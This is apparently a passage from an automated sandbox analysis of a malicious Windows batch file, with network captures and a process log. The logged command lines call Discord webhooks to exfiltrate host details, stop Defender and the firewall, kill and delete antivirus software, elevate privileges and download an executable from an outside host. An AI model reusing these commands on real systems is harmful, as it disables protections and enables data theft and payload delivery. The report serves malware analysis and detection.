                                                                                                                              2024-10-06 11:37:33 UTC1378INData Raw: 53 00 00 04 6f 8f 00 00 0a 72 c2 07 00 70 72 de 07 00 70 7e 28 00 00 04 28 69 00 00 0a 6f 90 00 00 0a 28 49 00 00 0a 72 e8 07 00 70 73 91 00 00 0a 0d 00 06 2c 48 06 17 3b a7 00 00 00 02 7b 53 00 00 04 08 09 6f 92 00 00 0a 6f 93 00 00 0a 13 04 12 04 28 94 00 00 0a 2d 41 02 16 25 0a 7d 4f 00 00 04 02 11 04 7d 54 00 00 04 02 7c 50 00 00 04 12 04 02 28 43 00 00 2b dd e5 00 00 00 02 7b 54 00 00 04 13 04 02 7c 54 00 00 04 fe 15 11 00 00 1b 02 15 25 0a 7d 4f 00 00 04 12 04 28 96 00 00 0a 25 6f 97 00 00 0a 26 6f 98 00 00 0a 6f 99 00 00 0a 6f 9a 00 00 0a 13 05 12 05 28 9b 00 00 0a 2d 3e 02 17 25 0a 7d 4f 00 00 04 02 11 05 7d 55 00 00 04 02 7c 50 00 00 04 12 05 02 28 44 00 00 2b de 7f 02 7b 55 00 00 04 13 05 02 7c 55 00 00 04 fe 15 13 00 00 1b 02 15 25 0a 7d 4f 00
                                                                                                                              Data Ascii: Sorprp~((io(Irps,H;{Soo(-A%}O}T|P(C+{T|T%}O(%o&ooo(->%}O}U|P(D+{U|U%}O
                                                                                                                              2024-10-06 11:37:33 UTC1378INData Raw: 00 00 0a 2d 3f 02 18 25 0a 7d 5e 00 00 04 02 08 7d 62 00 00 04 02 7c 5f 00 00 04 12 02 02 28 48 00 00 2b dd b3 00 00 00 02 7b 62 00 00 04 0c 02 7c 62 00 00 04 fe 15 15 00 00 1b 02 15 25 0a 7d 5e 00 00 04 12 02 28 a6 00 00 0a 26 02 7b 61 00 00 04 72 cf 0a 00 70 28 28 00 00 06 6f a4 00 00 0a 0c 12 02 28 a5 00 00 0a 2d 3c 02 19 25 0a 7d 5e 00 00 04 02 08 7d 62 00 00 04 02 7c 5f 00 00 04 12 02 02 28 48 00 00 2b de 50 02 7b 62 00 00 04 0c 02 7c 62 00 00 04 fe 15 15 00 00 1b 02 15 25 0a 7d 5e 00 00 04 12 02 28 a6 00 00 0a 26 de 17 0d 02 1f fe 7d 5e 00 00 04 02 7c 5f 00 00 04 09 28 20 00 00 0a de 13 02 1f fe 7d 5e 00 00 04 02 7c 5f 00 00 04 28 21 00 00 0a 2a 00 00 41 1c 00 00 00 00 00 00 07 00 00 00 58 02 00 00 5f 02 00 00 17 00 00 00 1b 00 00 01 1b 30 03 00 cb
                                                                                                                              Data Ascii: -?%}^}b|_(H+{b|b%}^(&{arp((o(-<%}^}b|_(H+P{b|b%}^(&}^|_( }^|_(!*AX_0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.2.864913162.159.128.2334433372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-06 11:37:39 UTC336OUTPOST /api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                              Content-Type: application/json
                                                                                                                              Host: ptb.discord.com
                                                                                                                              Content-Length: 50
                                                                                                                              Expect: 100-continue
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-10-06 11:37:39 UTC25INHTTP/1.1 100 Continue
                                                                                                                              2024-10-06 11:37:39 UTC50OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 46 61 69 6c 65 64 20 74 6f 20 64 6f 77 6e 6c 6f 61 64 20 65 78 65 2e 65 78 65 22 0d 0a 7d
                                                                                                                              Data Ascii: { "content": "Failed to download exe.exe"}
                                                                                                                              2024-10-06 11:37:40 UTC1369INHTTP/1.1 404 Not Found
                                                                                                                              Date: Sun, 06 Oct 2024 11:37:40 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 45
                                                                                                                              Connection: close
                                                                                                                              set-cookie: __dcfduid=648e1e3e83d711efa1222e6bea697208; Expires=Fri, 05-Oct-2029 11:37:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                              strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                              x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                              x-ratelimit-limit: 5
                                                                                                                              x-ratelimit-remaining: 4
                                                                                                                              x-ratelimit-reset: 1728214661
                                                                                                                              x-ratelimit-reset-after: 1
                                                                                                                              via: 1.1 google
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DCWBk2%2FUnFbrwYkx1MryQh%2BIRQdTLum%2FZejWsAr6aiu3euwg1TXNnt33p8%2B2Fxlv68Hz4n56518HpsgA%2BTgJQ3yxaoMWIORbY9axWm2THY8PUanmVYnGmbvXuUzWavLtUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                              Set-Cookie: __sdcfduid=648e1e3e83d711efa1222e6bea69720871fa1048c683cd0b23181c93d19fe4facf90e24b0bfe98c28416ab86fcd5cb02; Expires=Fri, 05-Oct-2029 11:37:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                              Set-Cookie: __cfruid=3e1b35420a45e4990d8b0aa7548cd31247594e2b-1728214660; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                              Set-Cookie: _cfuvi
                                                                                                                              2024-10-06 11:37:40 UTC238INData Raw: 64 3d 4c 4b 5f 51 4c 41 5a 79 46 73 50 56 64 69 47 30 33 42 62 4f 6e 42 6d 2e 6f 48 41 4f 75 64 57 46 38 36 67 55 51 56 36 4d 53 62 4d 2d 31 37 32 38 32 31 34 36 36 30 30 31 33 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 65 35 35 63 35 38 33 39 65 30 34 33 30 38 2d 45 57 52 0d 0a 0d 0a 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                              Data Ascii: d=LK_QLAZyFsPVdiG03BbOnBm.oHAOudWF86gUQV6MSbM-1728214660013-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8ce55c5839e04308-EWR{"message": "Unknown Webhook", "code": 10015}


                                                                                                                              Statistics

                                                                                                                              CPU Usage

                                                                                                                              Click to jump to process

                                                                                                                              Memory Usage

                                                                                                                              Click to jump to process

                                                                                                                              High Level Behavior Distribution

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Behavior

                                                                                                                              Click to jump to process

                                                                                                                              System Behavior

                                                                                                                              General

                                                                                                                              Target ID:1
                                                                                                                              Start time:07:36:04
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\main.bat.bin.bat" "
                                                                                                                              Imagebase:0x7ff7591a0000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:2
                                                                                                                              Start time:07:36:04
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6ee680000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:3
                                                                                                                              Start time:07:36:05
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:curl -s -H "Content-Type: application/json" -d "{\"content\":\"User: user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"
                                                                                                                              Imagebase:0x7ff7d29a0000
                                                                                                                              File size:530'944 bytes
                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:4
                                                                                                                              Start time:07:36:06
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:wmic computersystem get manufacturer,model
                                                                                                                              Imagebase:0x7ff707dc0000
                                                                                                                              File size:576'000 bytes
                                                                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:5
                                                                                                                              Start time:07:36:06
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\findstr.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:findstr /i "vmware virtualbox"
                                                                                                                              Imagebase:0x7ff72d1c0000
                                                                                                                              File size:36'352 bytes
                                                                                                                              MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:6
                                                                                                                              Start time:07:36:06
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:curl -s -H "Content-Type: application/json" -d "{\"content\":\"YAY user, Computer: user-PC\"}" "https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz"
                                                                                                                              Imagebase:0x7ff7d29a0000
                                                                                                                              File size:530'944 bytes
                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:7
                                                                                                                              Start time:07:36:07
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\net.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:net session
                                                                                                                              Imagebase:0x7ff7bbea0000
                                                                                                                              File size:59'904 bytes
                                                                                                                              MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:8
                                                                                                                              Start time:07:36:07
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\net1.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\net1 session
                                                                                                                              Imagebase:0x7ff793490000
                                                                                                                              File size:183'808 bytes
                                                                                                                              MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:9
                                                                                                                              Start time:07:36:07
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'"
                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:10
                                                                                                                              Start time:07:36:09
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline"
                                                                                                                              Imagebase:0x7ff61a0e0000
                                                                                                                              File size:2'759'232 bytes
                                                                                                                              MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:11
                                                                                                                              Start time:07:36:10
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES33AA.tmp" "c:\Users\user\AppData\Local\Temp\l1mwkpcb\CSC55DD152A8365426E9AFFE8E8746FD1A1.TMP"
                                                                                                                              Imagebase:0x7ff637540000
                                                                                                                              File size:52'744 bytes
                                                                                                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:12
                                                                                                                              Start time:07:36:14
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent()); if (-not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { Start-Process -FilePath 'cmd.exe' -ArgumentList '/c C:\Users\user\Desktop\main.bat.bin.bat' -Verb RunAs -WindowStyle Hidden; exit }; $process = Get-Process -Id $PID; $process.PriorityClass = 'High'; $process.ProcessorAffinity = 1; $process.PriorityBoostEnabled = $true"
                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:14
                                                                                                                              Start time:07:36:24
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "$s = @('SDRSVC','WinDefend','security center','wuauserv','Windows Defender Service','Windows Firewall','sharedaccess'); foreach ($service in $s) { Stop-Service -Name $service -Force -ErrorAction SilentlyContinue }"
                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:15
                                                                                                                              Start time:07:36:35
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "Stop-Process -Name MSASCui -Force -ErrorAction SilentlyContinue"
                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:16
                                                                                                                              Start time:07:36:36
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"
                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:17
                                                                                                                              Start time:07:36:39
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "$processes = @('mbam', 'mbamservice', 'avastsvc', 'avastui', 'avp', 'avgui', 'bdagent', 'bddownloader', 'bdredline', 'bdss', 'bdservicehost', 'bdnagent', 'bdscan', 'bdcore'); foreach ($p in $processes) { Stop-Process -Name $p -Force -ErrorAction SilentlyContinue }"
                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:20
                                                                                                                              Start time:07:36:55
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "$s='taskkill /F /IM'; $p=@('m'+'bam.exe','mbam'+'service.exe','avast'+'svc.exe','avast'+'ui.exe','a'+'vp.exe','avg'+'ui.exe','bd'+'agent.exe','bddownloader.exe','bdre'+'dline.exe','bd'+'ss.exe','bdserv'+'icehost.exe','bdnagent.exe','bds'+'can.exe','bdc'+'ore.exe'); foreach($i in $p){iex \"$s \"$i\"\"};"
                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:21
                                                                                                                              Start time:07:37:16
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "$paths = @(C:\Program Files\Malwarebytes\*.*''C:\Program Files\alwils~1\avast4\*.*', 'C:\Program Files\Lavasoft\Ad-awa~1\*.exe', 'C:\Program Files\kasper~1\*.exe', 'C:\Program Files\trojan~1\*.exe', 'C:\Program Files\f-prot95\*.dll', 'C:\Program Files\tbav\*.dat', 'C:\Program Files\avpersonal\*.vdf', 'C:\Program Files\Norton~1\*.cnt', 'C:\Program Files\Mcafee\*.*', 'C:\Program Files\Norton~1\Norton~3\*.*', 'C:\Program Files\Norton~1\Norton~1\speedd~1\*.*', 'C:\Program Files\Norton~1\Norton~1\*.*', 'C:\Program Files\Norton~1\*.*'); foreach ($p in $paths) { Remove-Item -Path $p -Force -Recurse -ErrorAction SilentlyContinue }"
                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:22
                                                                                                                              Start time:07:37:25
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "Stop-Process -Name explorer -Force -ErrorAction SilentlyContinue"
                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:23
                                                                                                                              Start time:07:37:26
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:explorer.exe
                                                                                                                              Imagebase:0x7ff62d7d0000
                                                                                                                              File size:5'141'208 bytes
                                                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:24
                                                                                                                              Start time:07:37:26
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:curl -s -H "Content-Type: application/json" -d "{\"content\":\"Failed to change directory to 'C:\\Users\\Public\\Documents\\Secret Document'\"}" "https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd"
                                                                                                                              Imagebase:0x7ff7d29a0000
                                                                                                                              File size:530'944 bytes
                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:25
                                                                                                                              Start time:07:37:27
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                              Imagebase:0x7ff67e6d0000
                                                                                                                              File size:55'320 bytes
                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:28
                                                                                                                              Start time:07:37:29
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:curl -s -H "Content-Type: application/json" -d "{\"content\":\"Failed to create and change directory to 'C:\\Users\\Public\\Documents\\Secret Document' after retry\"}" "https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd"
                                                                                                                              Imagebase:0x7ff7d29a0000
                                                                                                                              File size:530'944 bytes
                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:32
                                                                                                                              Start time:07:37:30
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "(New-Object Net.WebClient).DownloadFile('https://diva.ink/exe.exe', 'exe.exe')"
                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:35
                                                                                                                              Start time:07:37:34
                                                                                                                              Start date:06/10/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell -Command "Invoke-RestMethod -Uri 'https://ptb.discord.com/api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd' -Method Post -Body (@{content='Failed to download exe.exe'} | ConvertTo-Json) -ContentType 'application/json'"
                                                                                                                              Imagebase:0x7ff6cb6b0000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Disassembly

                                                                                                                              Reset < >

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:5.3%
                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:3
                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                execution_graph 4226 7ffb4b296dfb 4227 7ffb4b296e07 SetProcessWorkingSetSizeEx 4226->4227 4229 7ffb4b296ee1 4227->4229

                                                                                                                                Executed Functions

                                                                                                                                Function 00007FFB4B36091E Relevance: 2.6, Strings: 1, Instructions: 1305COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
